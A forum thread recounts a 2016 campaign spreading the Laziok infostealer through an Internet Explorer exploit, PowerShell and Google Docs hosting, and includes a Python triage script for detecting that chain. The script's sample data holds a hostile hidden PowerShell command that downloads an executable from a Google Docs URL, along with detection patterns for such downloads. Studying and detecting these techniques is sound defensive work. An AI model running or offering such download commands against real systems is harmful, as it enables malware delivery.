Windows PowerShell and Google Docs Abused to Spread Laziok Trojan

Alkajak

Thread author
During the month of March 2016, a threat group used a combination of exploits in Internet Explorer, the no-limits scripting of Windows PowerShell, and malware stored on Google Docs to infect targets with the Laziok trojan.

The Laziok trojan surfaced on the malware scene in March 2015, when Symantec observed cyber-espionage groups using it to spy on companies from the energy sector in countries in the Middle East.

Laziok is a simple infostealer, regularly used in reconnaissance campaigns when threat groups are gathering information on their target to use in attacks at a later stage.

Attack starts with malicious JavaScript code hosted on a Polish server
Malware analysts from security firm FireEye stumbled upon this threat while sifting through telemetry data, and say that in this particular distribution campaign, crooks were using malicious JavaScript hosted on a Polish server.

When a victim using the Internet Explorer browser was tricked into accessing a page hosting the malicious code, an exploit would execute, leverage the CVE-2014-6332 vulnerability, and run VBScript via Internet Explorer.

All IE versions from 3 to 11 are vulnerable, and the crooks would enter a so-called GodMode on the user's machine. From there, the crooks would use Windows PowerShell scripts to download the Laziok executable from a Google Docs URL.

Laziok is a perfect reconnaissance tool
Once Laziok is installed, the trojan immediately starts collecting information on its target. The infostealer collects the computer's name, CPU details, RAM size, location (country), and whether the user has any antivirus software installed.

The data would then be sent to the crooks' servers, where it would probably be used in other attacks, if those had not already taken place.

Security researchers found it extremely curious that the crooks managed to host Laziok on Google's servers, since Google is known to run automated virus scans on all the files hosted there.
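A defender-side triage check for the chain described in this post (Internet Explorer spawning a script host, PowerShell fetching a payload from a Google Docs URL), added here as an example and not code from the original post or from FireEye's analysis. The process-creation records are constructed, and their field names (`parent`, `image`, `cmdline`) are an assumption about how such telemetry is exported.

```python
import re

# Constructed sample events in the shape of Windows process-creation records
# (parent image, child image, command line). Illustrative only, not telemetry
# from the campaign discussed above; the Google Docs id is a placeholder.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
                ".DownloadFile('https://docs.google.com/uc?id=CONSTRUCTED','C:\\Users\\Public\\svc.exe')\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"parent": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "wscript.exe //e:vbscript stage.vbs"},
]

BROWSERS = ("iexplore.exe",)
SCRIPT_HOSTS = ("powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe")
# Cmdlets / classes commonly used to pull a second stage from the web.
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|net\.webclient", re.I)
# Payload staged on Google Docs / Drive, as in this campaign.
CLOUD_HOST_RE = re.compile(r"https?://(docs|drive)\.google\.com/", re.I)
# Hidden window, policy bypass or encoded command: not proof, but raises the score.
EVASION_RE = re.compile(r"-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)?\s+bypass|-enc(odedcommand)?\b", re.I)

def score_event(ev):
    """Return (score, reasons) for one process-creation event; each reason adds one point."""
    reasons = []
    parent = ev["parent"].lower().rsplit("\\", 1)[-1]
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    cmd = ev["cmdline"]
    if parent in BROWSERS and image in SCRIPT_HOSTS:
        reasons.append("browser spawned a script host")
    if image == "powershell.exe" and DOWNLOAD_RE.search(cmd):
        reasons.append("PowerShell download primitive on the command line")
    if CLOUD_HOST_RE.search(cmd):
        reasons.append("payload fetched from Google Docs/Drive")
    if EVASION_RE.search(cmd):
        reasons.append("hidden window / execution-policy bypass")
    return len(reasons), reasons

def triage(events, threshold=2):
    """Return (event, reasons) pairs whose score reaches the threshold."""
    return [(ev, score_event(ev)[1]) for ev in events if score_event(ev)[0] >= threshold]
```

Run against `SAMPLE_EVENTS`, only the first record (IE parent, hidden PowerShell pulling from docs.google.com) reaches the default threshold; the lone IE-to-wscript event scores one and is left for manual review.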
 
hjlbx

Thread author
Disable or uninstall PowerShell. Most users have no need of it. You can reinstall it via Programs.
 
